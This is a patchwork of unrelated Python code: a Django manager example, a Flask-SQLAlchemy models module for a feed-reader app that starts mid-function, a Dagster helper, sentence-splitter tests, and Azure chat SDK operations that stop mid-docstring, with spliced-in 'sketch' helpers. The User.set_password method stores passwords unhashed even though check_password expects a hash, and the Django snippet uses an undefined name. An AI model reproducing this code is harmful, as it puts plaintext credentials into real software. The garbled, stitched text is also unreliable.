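# the Article model and ArticleQuerySet below are illustrative only.
from django.db import models

class ArticleQuerySet(models.QuerySet):
    def published(self):
        return self.filter(is_published=True)

class Article(models.Model):
    title = models.CharField(max_length=200)
    is_published = models.BooleanField(default=False)

    # from_queryset() copies the public QuerySet methods (here: published) onto the
    # manager, so Article.objects.published() works without a hand-written manager.
    objects = Manager.from_queryset(ArticleQuerySet)()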
instance.save() def update(self, **kwargs): """Update specific fields of a record.""" for attr, value in kwargs.items(): setattr(self, attr, value) return self.save() def save(self): """Save the record.""" db.session.add(self) db.session.commit() return self def delete(self): """Remove the record from the database.""" db.session.delete(self) return db.session.commit() class BaseModel(PKMixin, CRUDMixin, db.Model): """Base model class that includes CRUD convenience methods.""" __abstract__ = True class PaginatedAPIMixin: """Pagination mixin.""" @staticmethod def to_collection_dict(query, page, per_page): """Paginate a collection.""" resources = query.paginate(page, per_page, False) data = { "items": [item.to_dict() for item in resources.items], "page": page, "per_page": per_page, "total_pages": resources.pages, "total_items": resources.total, } return data class Category(BaseModel): """Category model.""" __tablename__ = "categories" slug = db.Column(db.String(32), unique=True, nullable=False) title = db.Column(db.String(140), unique=True, nullable=False) def to_dict(self): """Return as a dict.""" return dict(id=self.id, slug=self.slug, title=self.title) def __repr__(self): """String representation.""" return self.title class Source(BaseModel): """Source model.""" __tablename__ = "sources" slug = db.Column(db.String(32), unique=True, nullable=False) title = db.Column(db.String(140), nullable=False) def to_dict(self): """Return as a dict.""" return dict(id=self.id, slug=self.slug, title=self.title) def __repr__(self): """String representation.""" return self.title class Status(BaseModel): """Feed status model.""" __tablename__ = "feed_statuses" feed_id = db.Column(db.Integer, db.ForeignKey("feeds.id"), unique=True) update_datetime = db.Column(db.DateTime, nullable=False, default=now) update_frequency = db.Column(db.Integer, default=0) active = db.Column(db.Boolean(), default=True) class Feed(BaseModel): """Feed model.""" __tablename__ = "feeds" source_id = db.Column(db.Integer, db.ForeignKey("sources.id")) category_id = db.Column(db.Integer, db.ForeignKey("categories.id")) url = db.Column(db.String(255), nullable=False) # ORM Relationship source = db.relationship("Source", uselist=False, backref="feeds") category = db.relationship("Category", uselist=False, backref="feeds") status = db.relationship("Status", uselist=False, backref="feed") def to_dict(self): """Return as a dict.""" return dict( source=self.source.to_dict(), category=self.category.to_dict(), url=self.url ) class PostQuery(BaseQuery, SearchQueryMixin): """Searchable Post query class.""" pass class Post(BaseModel, PaginatedAPIMixin): """Post model.""" __tablename__ = "posts" query_class = PostQuery feed_id = db.Column(db.Integer, db.ForeignKey("feeds.id")) title = db.Column(db.Unicode(255), nullable=False) desc = db.Column(db.UnicodeText) link = db.Column(db.String(255), nullable=False) published_datetime = db.Column(db.DateTime, nullable=False, default=now, index=True) ingested_datetime = db.Column(db.DateTime, nullable=False, default=now) actions = db.relationship("PostAction", uselist=False, backref="posts") search_vector = db.Column(TSVectorType("title", "desc")) feed = db.relationship("Feed", uselist=False, backref="posts") entities = db.relationship("Entity", backref="post") @property def uid(self): """Generate a deterministic UID from post ID.""" return short_url.encode_url(self.id, min_length=6) @staticmethod def from_uid(uid): """Given a deterministic UID, get the associated post.""" return 
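# --- Hedged usage sketch for the CRUD and pagination mixins above (requires an
# application/database context; it reuses the models defined in this module).
def crud_and_pagination_demo():
    # create() instantiates the model and saves it in one step.
    category = Category.create(slug="tech", title="Technology")
    # update() sets the given fields and commits again.
    category.update(title="Tech & Science")
    # to_collection_dict() wraps any query in the standard paginated payload.
    page = PaginatedAPIMixin.to_collection_dict(Category.query, page=1, per_page=20)
    return category, page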
Post.query.get(short_url.decode_url(uid)) @hybrid_property def ctr(self): """Post click through rate (object level).""" return float(self.actions.ctr) @ctr.expression def ctr(self): """Post click through rate (class level).""" return db.select([PostAction.ctr]).where(PostAction.post_id == self.id) def to_dict(self): """Return as a dict.""" payload = dict( id=self.id, uid=self.uid, title=self.title, link=url_for("app.follow_redirect", uid=self.uid, _external=True), post_url=self.link, feed=self.feed.to_dict(), published_datetime=self.published_datetime, ) return payload def __repr__(self): """String representation.""" return "{}: {}".format(self.id, self.title) class PostAction(BaseModel): """PostAction model.""" __tablename__ = "post_actions" post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) clicks = db.Column(db.Integer, default=0) impressions = db.Column(db.Integer, default=0) ctr = db.Column(db.Numeric(4, 3), default=0) post = db.relationship("Post", uselist=False, backref="post_actions") class EntityProcessQueue(BaseModel): """Entity queue model.""" __tablename__ = "entity_queue" post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), unique=True ) post = db.relationship("Post") class Entity(BaseModel): """Entity model.""" __tablename__ = "entities" entity = db.Column(db.String(40), nullable=False) post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) class SimilarityProcessQueue(BaseModel): """Similarity queue model.""" __tablename__ = "similarity_queue" post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), unique=True ) post = db.relationship("Post") class Similarity(BaseModel): """Similarity model.""" __tablename__ = "similarities" source_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) related_id = db.Column(db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE")) class JobType(BaseModel): """JobType model.""" __tablename__ = "job_types" job = db.Column(db.String(40), nullable=False) def __repr__(self): """String representation.""" return "Job Type: {}".format(self.job) class JobLock(BaseModel): """Job lock model.""" __tablename__ = "joblock" job_type = db.Column( db.Integer, db.ForeignKey("job_types.id", ondelete="CASCADE"), unique=True ) lock_datetime = db.Column(db.DateTime, nullable=False, default=now) job = db.relationship("JobType", uselist=False, backref="joblock") def __repr__(self): """String representation.""" return "Job Lock: {} at {}".format(self.job.job, self.lock_datetime) class Bookmark(BaseModel): """Bookmark model.""" __tablename__ = "bookmarks" user_id = db.Column(db.Integer, db.ForeignKey("user.id"), index=True) post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) action_datetime = db.Column(db.DateTime, nullable=False, default=now) post = db.relationship("Post", uselist=False, backref="bookmarks") db.Index("ix_user_bookmark", Bookmark.user_id, Bookmark.post_id) class PostView(BaseModel): """Post view model.""" __tablename__ = "post_views" user_id = db.Column(db.Integer, db.ForeignKey("user.id"), index=True) post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) action_datetime = db.Column(db.DateTime, nullable=False, default=now) post = db.relationship("Post", uselist=False, backref="post_views") user_excluded_sources = db.Table( "user_excluded_sources", db.Column("user_id", db.Integer(), db.ForeignKey("user.id")), 
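# --- Hedged sketch of the short-url identifier round trip used by Post above.
def uid_round_trip(post_id=42):
    post = Post.query.get(post_id)
    uid = post.uid                            # deterministic, at least 6 characters
    assert Post.from_uid(uid).id == post.id   # decode_url() inverts encode_url()
    return uid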
db.Column("source_id", db.Integer(), db.ForeignKey("sources.id")), ) user_excluded_categories = db.Table( "user_excluded_categories", db.Column("user_id", db.Integer(), db.ForeignKey("user.id")), db.Column("category_id", db.Integer(), db.ForeignKey("categories.id")), ) class User(BaseModel): """User model.""" email = db.Column(db.String(255), unique=True, index=True) password = db.Column(db.String(255), nullable=True) active = db.Column(db.Boolean(), default=True) confirmed = db.Column(db.Boolean(), default=False) last_seen = db.Column(db.DateTime) # ORM relationships excluded_sources = db.relationship( "Source", secondary=user_excluded_sources, lazy="subquery", backref=db.backref("user_excluded_sources", lazy=True), ) excluded_categories = db.relationship( "Category", secondary=user_excluded_categories, lazy="subquery", backref=db.backref("user_excluded_categories", lazy=True), ) bookmarks = db.relationship( "Post", secondary="bookmarks", order_by="desc(Bookmark.action_datetime)", lazy="dynamic", ) post_views = db.relationship( "Post", secondary="post_views", order_by="desc(PostView.action_datetime)", lazy="dynamic", ) def set_password(self, password): """Set a user's password.""" self.password = (password) self.save() def check_password(self, password): """Check a user's password.""" return check_password_hash(self.password, password) @staticmethod def get_user_from_identity(identity): """Get a user from a JWT.""" return User.query.filter_by(email=identity).first() def get_reset_password_token(self): """Get a password reset token.""" expires_in = 60 * 15 # 15 minutes secret = current_app.config["SECRET_KEY"] return encode_token("reset_password", self.id, secret, expires_in=expires_in) @staticmethod def verify_reset_password_token(token): """Verify a password reset token.""" secret = current_app.config["SECRET_KEY"] id = decode_token("reset_password", secret, token) if id is None: return None return User.query.get(id) def get_email_confirm_token(self): """Get an email confirmation token.""" expires_in = 60 * 60 * 24 # 24 hours secret = current_app.config["SECRET_KEY"] return encode_token("email_confirm", self.id, secret, expires_in=expires_in) @staticmethod def verify_email_confirm_token(token): """Verify an email confirmation token.""" secret = current_app.config["SECRET_KEY"] id = decode_token("email_confirm", secret, token) if id is None: return None return User.query.get(id) def to_dict(self): """Return as a dict.""" return dict(email=self.email, confirmed=self.confirmed) def __repr__(self): """String representation.""" return self.email from dagster.cli.load_handle import _cli_load_invariant, handle_for_pipeline_cli_args from dagster.core.definitions.container import get_active_repository_data_from_image from dagster.core.snap import PipelineSnapshot from dagster.seven import is_module_available def get_pipeline_snapshot_from_cli_args(cli_args): _cli_load_invariant(cli_args.get('pipeline_name') is not None) if cli_args.get('image'): _cli_load_invariant( is_module_available('docker'), msg='--image is not supported without dagster[docker] or the Python package docker installed.', ) active_repo_data = get_active_repository_data_from_image(cli_args.get('image')) return active_repo_data.get_pipeline_snapshot(cli_args.get('pipeline_name')[0]) else: pipeline_definition = handle_for_pipeline_cli_args(cli_args).build_pipeline_definition() return PipelineSnapshot.from_pipeline_def(pipeline_definition) sabjoslo/talking-politics from pyspan.json_to_txt import re_sent_end, get_sentences def 
test_get_sentences(): sentence1 = "This is a test sentence." assert get_sentences(sentence1, mode = "speech") == [sentence1] assert get_sentences(sentence1, mode = "sentences") == [sentence1] sentence2 = "This is a test sentence. So is this." assert get_sentences(sentence2, mode = "speech") == [sentence2] assert get_sentences(sentence2, mode = "sentences") == \ ["This is a test sentence.", "So is this."] sentence3 = "Is this a test sentence? I guess so." assert get_sentences(sentence3, mode = "speech") == [sentence3] assert get_sentences(sentence3, mode = "sentences") == \ ["Is this a test sentence?", "I guess so."] sentence4 = "This might be a test sentence...what do you think?" assert get_sentences(sentence4, mode = "speech") == [sentence4] assert get_sentences(sentence4, mode = "sentences") == [sentence4] ## I don't see a way around "edge cases" like these. #sentence5 = "Mr. Jones lives on 5th Ave. Mrs. Smith visited Dr. Doe, who works on 4th St., next to the grocery store." #assert get_sentences(sentence5, mode = "speech") == [sentence5] #assert get_sentences(sentence5, mode = "sentences") == \ # ["Mr. Jones lives on 5th Ave.", # "Mrs. Smith visited Dr. Doe, who works on 4th St., next to the grocery store."] sentence6 = "The House votes on H. Res. 1 today. I ask unanimous consent..." assert get_sentences(sentence6, mode = "speech") == [sentence6] assert get_sentences(sentence6, mode = "sentences") == \ ["The House votes on H. Res. 1 today.", "I ask unanimous consent..."] sentence7 = "This is 1.2 test sentences." assert get_sentences(sentence7, mode = "speech") == [sentence7] assert get_sentences(sentence7, mode = "sentences") == [sentence7] sentence8 = "LT. Bob won an award! Now I'll say a new sentence." assert get_sentences(sentence8, mode = "speech") == [sentence8] assert get_sentences(sentence8, mode = "sentences") == \ ["LT. Bob won an award!", "Now I'll say a new sentence."] sentence9 = "This is a sentence about salt. This is a sentence about pepper." assert get_sentences(sentence9, mode = "speech") == [sentence9] assert get_sentences(sentence9, mode = "sentences") == \ ["This is a sentence about salt.", "This is a sentence about pepper."] sentence10 = "This is a sentence about SALT. This is a sentence about PEPPER." assert get_sentences(sentence10, mode = "speech") == [sentence10] assert get_sentences(sentence10, mode = "sentences") == \ ["This is a sentence about SALT.", "This is a sentence about PEPPER."] sentence11 = "Can you believe this is a sentence?! What a world..." assert get_sentences(sentence11, mode = "speech") == [sentence11] assert get_sentences(sentence11, mode = "sentences") == \ ["Can you believe this is a sentence?!", "What a world..."] sentence12 = "Mr. Jones lives on 5th Ave., next to the pharmacy. Mrs. Smith visited Dr. Doe, who works on 4th St., next to the grocery store." assert get_sentences(sentence12, mode = "speech") == [sentence12] assert get_sentences(sentence12, mode = "sentences") == \ ["Mr. Jones lives on 5th Ave., next to the pharmacy.", "Mrs. Smith visited Dr. Doe, who works on 4th St., next to the grocery store."] sdk/communication/azure-communication-chat/azure/communication/chat/_generated/aio/operations/_chat_thread_operations.py # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. 
# Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import datetime from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar import warnings from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest from ... import models as _models T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class ChatThreadOperations: """ChatThreadOperations async operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.communication.chat.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config def list_chat_read_receipts( self, chat_thread_id: str, max_page_size: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any ) -> AsyncIterable["_models.ChatMessageReadReceiptsCollection"]: """Gets chat message read receipts for a thread. Gets chat message read receipts for a thread. :param chat_thread_id: Thread id to get the chat message read receipts for. :type chat_thread_id: str :param max_page_size: The maximum number of chat message read receipts to be returned per page. :type max_page_size: int :param skip: Skips chat message read receipts up to a specified position in response. 
:type skip: int :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either ChatMessageReadReceiptsCollection or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.communication.chat.models.ChatMessageReadReceiptsCollection] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatMessageReadReceiptsCollection"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_chat_read_receipts.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if max_page_size is not None: query_parameters['maxPageSize'] = self._serialize.query("max_page_size", max_page_size, 'int') if skip is not None: query_parameters['skip'] = self._serialize.query("skip", skip, 'int') query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('ChatMessageReadReceiptsCollection', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_chat_read_receipts.metadata = {'url': '/chat/threads/{chatThreadId}/readReceipts'} # type: ignore async def send_chat_read_receipt( self, chat_thread_id: str, send_read_receipt_request: "_models.SendReadReceiptRequest", **kwargs: Any 
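# --- Hedged consumption sketch for the paged operation above: the AsyncItemPaged
# returned by list_chat_read_receipts is consumed with `async for`, which follows
# next_link transparently. `chat_thread_ops` stands for a ChatThreadOperations
# instance obtained from the generated client (how it is constructed is assumed).
async def print_read_receipts(chat_thread_ops, chat_thread_id: str) -> None:
    async for receipt in chat_thread_ops.list_chat_read_receipts(chat_thread_id, max_page_size=50):
        print(receipt)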
) -> None: """Sends a read receipt event to a thread, on behalf of a user. Sends a read receipt event to a thread, on behalf of a user. :param chat_thread_id: Thread id to send the read receipt event to. :type chat_thread_id: str :param send_read_receipt_request: Read receipt details. :type send_read_receipt_request: ~azure.communication.chat.models.SendReadReceiptRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.send_chat_read_receipt.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(send_read_receipt_request, 'SendReadReceiptRequest') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) send_chat_read_receipt.metadata = {'url': '/chat/threads/{chatThreadId}/readReceipts'} # type: ignore async def send_chat_message( self, chat_thread_id: str, send_chat_message_request: "_models.SendChatMessageRequest", **kwargs: Any ) -> "_models.SendChatMessageResult": """Sends a message to a thread. Sends a message to a thread. :param chat_thread_id: The thread id to send the message to. :type chat_thread_id: str :param send_chat_message_request: Details of the message to send. 
:type send_chat_message_request: ~azure.communication.chat.models.SendChatMessageRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: SendChatMessageResult, or the result of cls(response) :rtype: ~azure.communication.chat.models.SendChatMessageResult :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.SendChatMessageResult"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.send_chat_message.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(send_chat_message_request, 'SendChatMessageRequest') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [201]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = self._deserialize('SendChatMessageResult', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized send_chat_message.metadata = {'url': '/chat/threads/{chatThreadId}/messages'} # type: ignore def list_chat_messages( self, chat_thread_id: str, max_page_size: Optional[int] = None, start_time: Optional[datetime.datetime] = None, **kwargs: Any ) -> AsyncIterable["_models.ChatMessagesCollection"]: """Gets a list of messages from a thread. Gets a list of messages from a thread. :param chat_thread_id: The thread id of the message. :type chat_thread_id: str :param max_page_size: The maximum number of messages to be returned per page. :type max_page_size: int :param start_time: The earliest point in time to get messages up to. The timestamp should be in RFC3339 format: ``yyyy-MM-ddTHH:mm:ssZ``. 
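# --- Hedged sketch: calling the unary send_chat_message operation above and handling
# the HttpResponseError raised for non-201 responses. The SendChatMessageRequest
# field names (content, sender_display_name) follow the Communication Chat REST API
# but are assumptions here, as is the `.id` attribute on the result.
async def send_hello(chat_thread_ops, chat_thread_id: str):
    request = _models.SendChatMessageRequest(content="Hello!", sender_display_name="bot")
    try:
        result = await chat_thread_ops.send_chat_message(chat_thread_id, request)
        return result.id
    except HttpResponseError as err:
        print("send_chat_message failed:", err)
        return None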
:type start_time: ~datetime.datetime :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either ChatMessagesCollection or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.communication.chat.models.ChatMessagesCollection] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatMessagesCollection"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_chat_messages.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if max_page_size is not None: query_parameters['maxPageSize'] = self._serialize.query("max_page_size", max_page_size, 'int') if start_time is not None: query_parameters['startTime'] = self._serialize.query("start_time", start_time, 'iso-8601') query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('ChatMessagesCollection', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_chat_messages.metadata = {'url': '/chat/threads/{chatThreadId}/messages'} # type: ignore async def get_chat_message( self, chat_thread_id: str, chat_message_id: str, **kwargs: Any ) -> "_models.ChatMessage": """Gets a message by id. 
Gets a message by id. :param chat_thread_id: The thread id to which the message was sent. :type chat_thread_id: str :param chat_message_id: The message id. :type chat_message_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: ChatMessage, or the result of cls(response) :rtype: ~azure.communication.chat.models.ChatMessage :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatMessage"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" # Construct URL url = self.get_chat_message.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), 'chatMessageId': self._serialize.url("chat_message_id", chat_message_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = self._deserialize('ChatMessage', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_chat_message.metadata = {'url': '/chat/threads/{chatThreadId}/messages/{chatMessageId}'} # type: ignore async def update_chat_message( self, chat_thread_id: str, chat_message_id: str, update_chat_message_request: "_models.UpdateChatMessageRequest", **kwargs: Any ) -> None: """Updates a message. Updates a message. :param chat_thread_id: The thread id to which the message was sent. :type chat_thread_id: str :param chat_message_id: The message id. :type chat_message_id: str :param update_chat_message_request: Details of the request to update the message. 
:type update_chat_message_request: ~azure.communication.chat.models.UpdateChatMessageRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/merge-patch+json") accept = "application/json" # Construct URL url = self.update_chat_message.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), 'chatMessageId': self._serialize.url("chat_message_id", chat_message_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(update_chat_message_request, 'UpdateChatMessageRequest') body_content_kwargs['content'] = body_content request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) update_chat_message.metadata = {'url': '/chat/threads/{chatThreadId}/messages/{chatMessageId}'} # type: ignore async def delete_chat_message( self, chat_thread_id: str, chat_message_id: str, **kwargs: Any ) -> None: """Deletes a message. Deletes a message. :param chat_thread_id: The thread id to which the message was sent. :type 